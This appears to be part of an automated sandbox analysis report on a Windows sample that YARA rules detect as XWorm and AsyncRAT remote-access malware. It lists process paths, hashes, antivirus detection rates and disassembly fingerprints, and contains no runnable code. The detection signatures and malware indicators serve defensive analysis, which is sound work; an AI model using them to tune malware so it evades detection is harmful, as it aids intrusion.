                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:high
                                                                                      Has exited:true
                                                                                      Show Windows behavior

                                                                                      File Activities

                                                                                      Show Windows behavior

                                                                                      Section Activities

                                                                                      Show Windows behavior

                                                                                      Registry Activities

                                                                                      Powershell Activities

                                                                                      Show Windows behavior

                                                                                      Mutex Activities

                                                                                      Show Windows behavior

                                                                                      Process Activities

                                                                                      Show Windows behavior

                                                                                      Thread Activities

                                                                                      Show Windows behavior

                                                                                      Memory Activities

                                                                                      Show Windows behavior

                                                                                      System Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Windows UI Activities

                                                                                      Process Token Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:04:35:15
                                                                                      Start date:30/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff75da10000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true
                                                                                      Show Windows behavior

                                                                                      File Activities

                                                                                      Show Windows behavior

                                                                                      Section Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Mutex Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Thread Activities

                                                                                      Show Windows behavior

                                                                                      Memory Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Windows UI Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:04:35:18
                                                                                      Start date:30/01/2025
                                                                                      Path:C:\Users\user\AppData\Local\Temp\tmpB20E.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\tmpB20E.exe"
                                                                                      Imagebase:0xf10000
                                                                                      File size:33'280 bytes
                                                                                      MD5 hash:F5302ED0307CE30D226D50A45A0DCA9D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: Joe Security
                                                                                      • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: Sekoia.io
                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: ditekSHen
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 72%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:false
                                                                                      Show Windows behavior

                                                                                      File Activities

                                                                                      Show Windows behavior

                                                                                      Section Activities

                                                                                      Show Windows behavior

                                                                                      Registry Activities

                                                                                      Show Windows behavior

                                                                                      COM Activities

                                                                                      Show Windows behavior

                                                                                      Mutex Activities

                                                                                      Show Windows behavior

                                                                                      Process Activities

                                                                                      Show Windows behavior

                                                                                      Thread Activities

                                                                                      Show Windows behavior

                                                                                      Memory Activities

                                                                                      Show Windows behavior

                                                                                      System Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      Network Activities

                                                                                      Process Token Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      Disassembly

                                                                                      Executed Functions

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1375039488.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac680000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 5@_H
                                                                                      • API String ID: 0-3541029494
                                                                                      • Opcode ID: 01a333337772888037714f36d4cd0e7a581d50c1cc58333196a0c233131e755b
                                                                                      • Instruction ID: d8b3c1300b1473d20c08be318d073839ee1db532ab0b385c4b3ef55cc93f1ce6
                                                                                      • Opcode Fuzzy Hash: 01a333337772888037714f36d4cd0e7a581d50c1cc58333196a0c233131e755b
                                                                                      • Instruction Fuzzy Hash: B3221562A0EB898FFB96D72888155B57FE1EF57220B0895FBD04DC7193DA18DD0A83C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1375039488.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac680000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b87c44039c7b19ce6fd3acc9f44c5da563d34b3dfdbd3e3fffa33d628fb61784
                                                                                      • Instruction ID: b1fc26cdc7de00b5034ece53e5ae08fcc1f6a6a6afc155872a646605693e46f1
                                                                                      • Opcode Fuzzy Hash: b87c44039c7b19ce6fd3acc9f44c5da563d34b3dfdbd3e3fffa33d628fb61784
                                                                                      • Instruction Fuzzy Hash: 3722F46290EB8A8FE797D76848255B07FE0EF57210B0994FBD04DCB1A3EA18DD09C391
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1375039488.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac680000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a9591745f483c8980e2defe32f1ade7b43224e408ba480f0ffe6cc10c2e33e94
                                                                                      • Instruction ID: 54f2f4f4ee61c783ff62253f3ac85d17a18518e6244d06e33a496d7867582eb5
                                                                                      • Opcode Fuzzy Hash: a9591745f483c8980e2defe32f1ade7b43224e408ba480f0ffe6cc10c2e33e94
                                                                                      • Instruction Fuzzy Hash: 7241167190EB8A8FE796DB6884556707BE1EF56310B0A94FAD00DCB1A3EB18DD09C391
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1375039488.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac680000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 45dc6fcd7a6a31da0ed939c68e78f134d61e6c1c0a2bfa20875e5d558006307b
                                                                                      • Instruction ID: 653b682ee98bfc0105791b5059a893f5afb3a017506382e0814b8d619bcc755d
                                                                                      • Opcode Fuzzy Hash: 45dc6fcd7a6a31da0ed939c68e78f134d61e6c1c0a2bfa20875e5d558006307b
                                                                                      • Instruction Fuzzy Hash: F511E962E1F90A8EF39AD31C64561BD26C2EF85210B85A677E40EC2183DF0CE90A13C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1374559675.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac5b0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                      • Instruction ID: 60d966cfca8837c1e02843e0c406bab2d0bb224080e14aa2f4855be8fd55994f
                                                                                      • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                      • Instruction Fuzzy Hash: 2A01677115CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661DB36E881CB45

                                                                                      Non-executed Functions

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1374559675.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac5b0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (0$8,$P/$p0$-$/
                                                                                      • API String ID: 0-3999472803
                                                                                      • Opcode ID: aef3f0f8af673bce50ff9bb4f5c40aab03d3db4ad82889c351505f802f28cd7c
                                                                                      • Instruction ID: 79ce21de1b0bb0cab0a32e2f180c263266b9fc69e2d0ff936bf44cfd23f462c4
                                                                                      • Opcode Fuzzy Hash: aef3f0f8af673bce50ff9bb4f5c40aab03d3db4ad82889c351505f802f28cd7c
                                                                                      • Instruction Fuzzy Hash: AF21438394F7C24FF31687A42826139AE99AFD3250B19D4FBE0CC865DBA845CD4883C2

                                                                                      Executed Functions

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3dbe3807a392b5b90ad742c15ad6a86fd8a5fd84708ab415ee58ee0118aa02f8
                                                                                      • Instruction ID: 116786e74fcaf9b5d3142a1f6b84f647f11172a6bbbcb89454fcc023180dac4d
                                                                                      • Opcode Fuzzy Hash: 3dbe3807a392b5b90ad742c15ad6a86fd8a5fd84708ab415ee58ee0118aa02f8
                                                                                      • Instruction Fuzzy Hash: E8F1B470908A4E8FEBA8EF28C8557E97BD1FF55310F04826AE84DC7292DF34D9458B81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c7bbd8dabfdcaed91ead00eaca802cefd2e85c3ca10be2b62f5eb8bba2e6c636
                                                                                      • Instruction ID: 408e4704f36da7d79abf3b8360532495e0b4ed3d5717d135ee7ef5ac45fa21ea
                                                                                      • Opcode Fuzzy Hash: c7bbd8dabfdcaed91ead00eaca802cefd2e85c3ca10be2b62f5eb8bba2e6c636
                                                                                      • Instruction Fuzzy Hash: 15E1B570508A4E8FEB68EF28C8567E97BD1FF55310F04826AE84DC7291DE74E9458BC1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: &M_
                                                                                      • API String ID: 0-654913119
                                                                                      • Opcode ID: 882220272741732d0182c7f03fee3219b3f12075925737f92680c566b38a92db
                                                                                      • Instruction ID: e502e2757dd9bac0748c30c894c67ca9d0e3737573c0a3606bdec52c69529740
                                                                                      • Opcode Fuzzy Hash: 882220272741732d0182c7f03fee3219b3f12075925737f92680c566b38a92db
                                                                                      • Instruction Fuzzy Hash: FD023AA2E1EA878BF359972C98651B57FD5EF56310B0481BAE08EC71D3FD1C980A83D1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0?
                                                                                      • API String ID: 0-4267706699
                                                                                      • Opcode ID: 9f22f2dd8655efef36c50718234f0a5f0175c6ff693c11ec3f8e155619493ddc
                                                                                      • Instruction ID: 4ebee8026c102d956d9859537ebcbf9a4dc57765c822f208779d7d7ca05e1088
                                                                                      • Opcode Fuzzy Hash: 9f22f2dd8655efef36c50718234f0a5f0175c6ff693c11ec3f8e155619493ddc
                                                                                      • Instruction Fuzzy Hash: A251AF70909A5DCFEB9CEB28C459AA97BE1FF56315F00416EE00ED3692DB35D8058B80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0?
                                                                                      • API String ID: 0-4267706699
                                                                                      • Opcode ID: 192795b77a8c026c2e618af4287f5bb453c15b648cea56e2b3e2cd8443385c4c
                                                                                      • Instruction ID: 31d1fc65aadcb7c3609539af34f7474071fa049d2ebbd69e9f6a507b981c6714
                                                                                      • Opcode Fuzzy Hash: 192795b77a8c026c2e618af4287f5bb453c15b648cea56e2b3e2cd8443385c4c
                                                                                      • Instruction Fuzzy Hash: B5418D74909A1DCFEB9CEF28C459BA97BE1FB55305F00416EE00ED3692DB35E8428B80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: d
                                                                                      • API String ID: 0-2564639436
                                                                                      • Opcode ID: 6aced895bef4ab0aef46f6a02ec6b18e4b3629d2c23487b906c722bd254352da
                                                                                      • Instruction ID: d62e0704fb015627d7e58feb8ba2de6e26136d2ae9ef0519eef38d2ac0ddc2e7
                                                                                      • Opcode Fuzzy Hash: 6aced895bef4ab0aef46f6a02ec6b18e4b3629d2c23487b906c722bd254352da
                                                                                      • Instruction Fuzzy Hash: BA21CF31C4D25ACFEB04ABA4C8056F9BBF4EF4A390F0541BAE44DD7192EB2C944987E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce82ecaaea305696be8f1c801342a93a297b523f704a9f4fcdf1c679b9779431
                                                                                      • Instruction ID: e20bff5eded4afad62bb0323efdd07a193f8629b324dfa8e039127c819439d2c
                                                                                      • Opcode Fuzzy Hash: ce82ecaaea305696be8f1c801342a93a297b523f704a9f4fcdf1c679b9779431
                                                                                      • Instruction Fuzzy Hash: 32A128A1E1C94A8BF798AB3C84556B9ABD6EF99340F544179F04FD32D3ED289C0687C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a1a90ddd61119e8a170e7d44f137bfaf01efe0135a1e7b3f429b1d266355611
                                                                                      • Instruction ID: 70c89aad176e0080ed6cf3ba80112f686d50b7f307d659cd2e8eb5be0fe5ae19
                                                                                      • Opcode Fuzzy Hash: 9a1a90ddd61119e8a170e7d44f137bfaf01efe0135a1e7b3f429b1d266355611
                                                                                      • Instruction Fuzzy Hash: B8B1A570508A4E8FEB69EF28C8557E93BE1FF55310F04826EE44DC7292DE349945CB82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b01aa3d0536b4210ac5707d5ffe0d326599aaaed81c365f04928a003805baa11
                                                                                      • Instruction ID: 65954c8f1dac7e45ae5b1719babae06235322801332b943f1bb3f47993a29d38
                                                                                      • Opcode Fuzzy Hash: b01aa3d0536b4210ac5707d5ffe0d326599aaaed81c365f04928a003805baa11
                                                                                      • Instruction Fuzzy Hash: 40A139A1E1DA4A8BF798A73C84556B9ABD2EF99340F544179F04FD32D3ED289C0683C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63f908791b04f461ece4893382dc325b7a5376c4aa6d87c43a577e926f31921c
                                                                                      • Instruction ID: bcb81ee0ccaddda3a36028c23da8fe6c506237583339f8bdc09287bde01c117c
                                                                                      • Opcode Fuzzy Hash: 63f908791b04f461ece4893382dc325b7a5376c4aa6d87c43a577e926f31921c
                                                                                      • Instruction Fuzzy Hash: AEA1A46071C9469BE788B77CC85577AB7D6EFA9300F648175E00EC37A7DD2CA84183A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d90a1011a7e7656d1e11d02000a3da5d2c96e569952684ae0247bf070b814a03
                                                                                      • Instruction ID: 0d625f4fd31105c21d678556f7c6761c19ea8885237e42aed37a28442ff7de6f
                                                                                      • Opcode Fuzzy Hash: d90a1011a7e7656d1e11d02000a3da5d2c96e569952684ae0247bf070b814a03
                                                                                      • Instruction Fuzzy Hash: F9210862D0EB8A8FF746A32868254B97FA5EF56250B0541F7E04DC7193EC189C0943E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b6e2da55b20b138fa02a4f2c99cdb656f247c230f2b2c8b5cf9cfda1f78f742
                                                                                      • Instruction ID: 46256b39ffda43deb394dac421ff736e273f1453c99c7e5a796f4df0635cf8dd
                                                                                      • Opcode Fuzzy Hash: 1b6e2da55b20b138fa02a4f2c99cdb656f247c230f2b2c8b5cf9cfda1f78f742
                                                                                      • Instruction Fuzzy Hash: B8517170D08A0D8FDB58EF68D845BE9BBF1FF59310F1082AAD44DD3652DA34A946CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7d8dc89bb2175b7f271f2ccebc83639efc40eebb8c60fe2291a5c22530044743
                                                                                      • Instruction ID: 0c35cdba028e61ddbd82521a7cf1077354e4a9c8fe8a890e292d7642190a5758
                                                                                      • Opcode Fuzzy Hash: 7d8dc89bb2175b7f271f2ccebc83639efc40eebb8c60fe2291a5c22530044743
                                                                                      • Instruction Fuzzy Hash: 0751F9A1E59A4E8FE798F77884696BD7BD6FF8921078085B9F00FD31C7DD2898058390
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b581cd11ad18553548321101cc8d0ec58914683ccb9071a57e36f3f13da2d45e
                                                                                      • Instruction ID: 7803745d41173e76597b8424e04d7842ee3f785bd60232ca5b3c4c62662973f3
                                                                                      • Opcode Fuzzy Hash: b581cd11ad18553548321101cc8d0ec58914683ccb9071a57e36f3f13da2d45e
                                                                                      • Instruction Fuzzy Hash: CF515B71A095498FEB98E738C859AF97BE5EF59310F1441BAE00DD32A3DD28EC42C780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f79d9e1579909e2b588bd3aa28850b076f92636173a76a71c2d39fa88130338
                                                                                      • Instruction ID: 0bfe26fd164f95d40c61870fd0822e786eff3f474b179e838e355de8e17ae044
                                                                                      • Opcode Fuzzy Hash: 4f79d9e1579909e2b588bd3aa28850b076f92636173a76a71c2d39fa88130338
                                                                                      • Instruction Fuzzy Hash: 6351017090C64DCFE708DB68D855AB87BF0EF56314F04816AE00EC72A3DA29A8468B91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3de033272ec281eadf6591a11f1a6bfb690d0669fc03c64a3e8b46e1284436d1
                                                                                      • Instruction ID: 48bccf3bee700d6577c3a3f2809c0e9cf816891a6c78099bd1b35a48151ae583
                                                                                      • Opcode Fuzzy Hash: 3de033272ec281eadf6591a11f1a6bfb690d0669fc03c64a3e8b46e1284436d1
                                                                                      • Instruction Fuzzy Hash: 82518270908A1C8FDB58DF68D845BE9BBF1FB59310F0082AAD04DE3252DE34A9858FC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f77e7f342dab3ca0b0469cd48659c194e64bcabaeefb1fdc8fe8416cc853e0b0
                                                                                      • Instruction ID: 53a847c656dde0aa31cf140d9b78e450aa6d4367762e851290ae91a672248982
                                                                                      • Opcode Fuzzy Hash: f77e7f342dab3ca0b0469cd48659c194e64bcabaeefb1fdc8fe8416cc853e0b0
                                                                                      • Instruction Fuzzy Hash: 81512531D0D6868FE74A977484126A6BFA1EF17310F1842F9E09AC71D3DE2CA846C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5930c67fa735bde671ace24ab925ed06874b12e46afcfcbcdc190993a1a66e68
                                                                                      • Instruction ID: 612a8e4995ed50e477c0b2bca23575bc82f20dcbfc74b08be37ebcecba5f982a
                                                                                      • Opcode Fuzzy Hash: 5930c67fa735bde671ace24ab925ed06874b12e46afcfcbcdc190993a1a66e68
                                                                                      • Instruction Fuzzy Hash: 4F411761F1D94A4FF399B73CD446A797BC6EF96211B0484B9E44EC3293ED18AC428381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7bbf5b1c293f1dc1badaab1a69a66c0b4374f544b66550e1f0f3f4a293663747
                                                                                      • Instruction ID: d5ac5019cead19c917344f317dab3e7d3d028c06a880fde9890e19adb6844a90
                                                                                      • Opcode Fuzzy Hash: 7bbf5b1c293f1dc1badaab1a69a66c0b4374f544b66550e1f0f3f4a293663747
                                                                                      • Instruction Fuzzy Hash: 0451D061D4E90B9FFB4DEB3888466A57BD4EF16314F4492B9E00DC71D3ED18E84A8391
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 350811704dd66d870325f2e5392828560dbdd3e110985e3e6891b0847dd18d0a
                                                                                      • Instruction ID: 4c6e1fdcfb586f77c24269239890f6a357e9193e6d9e17de87d8d138bd28e200
                                                                                      • Opcode Fuzzy Hash: 350811704dd66d870325f2e5392828560dbdd3e110985e3e6891b0847dd18d0a
                                                                                      • Instruction Fuzzy Hash: C0518870A1991E9FEB9CEB28D845ABC77E6FF99304F405579F00DD3292DE38A8458780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 605cc8ab646c959cc2b560400bd0eaabe77d1e336d90a671eb4eea3f651df42d
                                                                                      • Instruction ID: e8edbac63162b82f03f249f79e1b14c971a0dcb2a6914450eecc838e87e4a9c1
                                                                                      • Opcode Fuzzy Hash: 605cc8ab646c959cc2b560400bd0eaabe77d1e336d90a671eb4eea3f651df42d
                                                                                      • Instruction Fuzzy Hash: DD51C571A1994A8FEB9DEB28D8556A87BE5FF56304F0484B9F00DD3293DE28A8458780
